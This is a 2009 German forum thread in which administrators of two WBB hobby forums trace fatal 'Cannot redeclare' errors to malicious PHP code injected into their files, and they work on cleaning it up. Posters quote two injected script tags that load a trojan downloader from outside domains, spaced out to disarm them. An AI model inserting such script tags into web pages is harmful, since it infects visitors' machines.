• Weiß jemand, was folgende Fehlermeldung auf der WBB Startseite bedeutet?


    Fatal error: Cannot redeclare lmvs() (previously declared in /pages/0a/7c/d0006184/home/htdocs/mn-welt/neuduesterstein/Forum/index.php(1) : eval()'d code:1) in /pages/0a/7c/d0006184/home/htdocs/mn-welt/neuduesterstein/Forum/acp/lib/functions.php(1) : eval()'d code on line 1


    bzw. was man tun kann?

  • Die Funktion lmsv() konnte nicht (re)deklariert werden.


    Diese Funktion gibt es aber beim wbblite offenbar gar nicht, eine Suche in den entsprechenden Dateien brachte kein Ergebnis.

    "Ist es denn wirklich so, dass wir jeden Dreck, der vom Westen kommt, nu kopieren müssen? Ich denke, Genossen, mit der Monotonie des OIK-Bashings, und wie das alles heißt, ja, sollte man doch Schluss machen" Walter Albrecht

  • Hab nix geändert. Möglich daß ich ich einen Virus auf der Platte hatte, der was änderte? Denn auf einer anderen Homepage von mir kam die gleiche Fehlermeldung. Ich habe leider keinen Plan, wie ich das wieder hinbekomme.

  • Auf der Platte nicht, aber aufm Webspace.
    Ich würde jetzt mal raten, wenn du die Dateien des Forums in einem Texteditor öffnest, findest du in jeder einzelnen Datei am Anfang Schadcode, der sich meist auf unsicher konfigurierte Server oder Scripte mit Sicherheitslücken zurückführen lässt.

  • Ich habe mal aus 4 Dateien im Verzeichnis /acp/lib/ die Codeschnipsel am Dateianfang rausgenommen, selbiges bei den beiden index.php Dateien.


    Nun ist, wie der Hirte richtig festgestellt hat in ALLEN .tpl-Dateien beider Templates-Verzeichnisse der Script-Code <script s r c=h t t p : / / g i r l y g a m e . n e t / v a n - j e l l i e s / b o o k m a r k . p h p ></script>enthalten. (Ich habe das mal gesperrt geschrieben, damit das hier nicht als Webadresse interpretiert wird und zur Virenalarm-Meldung führt.) Der muss da noch raus. Bei mir meldet der Virenscanner nun beim Aufruf der Neudüstersteinseiten und des Forums einen Virus: JS:Downloader-EX [Trj] mit der Adresse girlygame.net

  • Bei den USSRAT sieht man :


    Fatal error: Cannot redeclare j3i() (previously declared in /usr/export/www/vhosts/funnetwork/hosting/sowjetrepublik/forum/index.php(1) : eval()'d code:1) in /usr/export/www/vhosts/funnetwork/hosting/sowjetrepublik/forum/acp/lib/functions.php(1) : eval()'d code on line 1



    Auch off also.

  • Ich bin einfach mal wieder entsetzt. Na wenigstens hat es dann keiner gahackt, sondern da ham wa uns nur ein wenig dumm angestellt. Zum glück haben wir zwei Foren...


    Ich hoffe aber, dass man das wieder hinbekommt, oder?


    *Vor Angst zitternd wegen all der schönen Beiträge und Daten.*

  • Danke für die Hilfen! Neudüsterstein läuft jetzt erstmal wieder, werde nach und nach die verbliebenen Codeschnipsel beheben. In der USSRAT hat sich
    < s c r i p t s r c = h t t p : / / d a y s p a x a l a p a . c o m / o n l i n e / c o m p i l e / z l o e . p h p > < / s c r i p t > eingeschlichen. Ich habe für die USSRAT aus den beiden index-Dateien die Schnipsel der Dateianfänge entfernt, ebenso aus den tpl-Dateien. Jetzt erscheint aber nur eine weiße Seite. Habe die index-Dateien mal als Dateianhänge hochgeladen, vielleicht kann jemand helfen.

  • Heute ist derselbe Fehler wieder aufgetreten. Da ergibt es keinen Sinn, das erneut abzustellen, oder?


    Doch. Ich habe halt nochmal die erste "Säuberungsaktion" durchgeführt und das Forum wieder aufrufbar gemacht. Die Korrekturen an den Templates-Dateien sollte aber schnellstmöglich nachgeholt werden. Vielleicht empfiehlt sich auch mal nach einer Datenbanksicherung das Neuaufsetzen des Forums.

    Bei welchem Hoster bist du?


    Homepage und Forum von Neudüsterstein liegen auf einem Strato-Businessserver. Wenn Du helfen kannst und willst, Hirte, richte ich Dir gern mit Zustimmung des Grafen einen eigenen FTP-Zugang auf den Webspace ein.

  • Vielen Dank! Klar, kann der Hirte meine FTP Zugangsdaten haben. Vielleicht hilfts ja. Habe die gesäuberten Files nun gesichert. Das mit dem Neuaufsetzen des Forums wird etwas schwierig, weil da sehr viele Hacks drin sind. Sorry, wenn ich derzeit nicht schnell reagiere, obwohl es ja mein Problem ist, ich bin beruflich grad viel unterwegs.

  • ILove[dot]de scheint bei den USSRAT den Template ersetzt zu haben bitte sehe http://sowjetrepublik.so.funpic.de/template


    Ich bin nicht sicher aber das könnte das problem sein ,den "evil ()d' code " verweist (auch) nach ein Template fehler


    In den Forums wurde 15-Oct-2009 06:38 etwas getan..laut den Index/


    Und heute war wieder ein fruh ünterwegs im Forum USSRAT
    16-Oct-2009 08:04
    Der Fehlermeldung hatt sich geändert und lautet jetst:
    Cannot redeclare no60g() (previously declared in /usr/export/www/vhosts/funnetwork/hosting/sowjetrepublik/forum/index.php(1) : eval()'d code:1) in /usr/export/www/vhosts/funnetwork/hosting/sowjetrepublik/forum/acp/lib/functions.php(1) : eval()'d code on line 1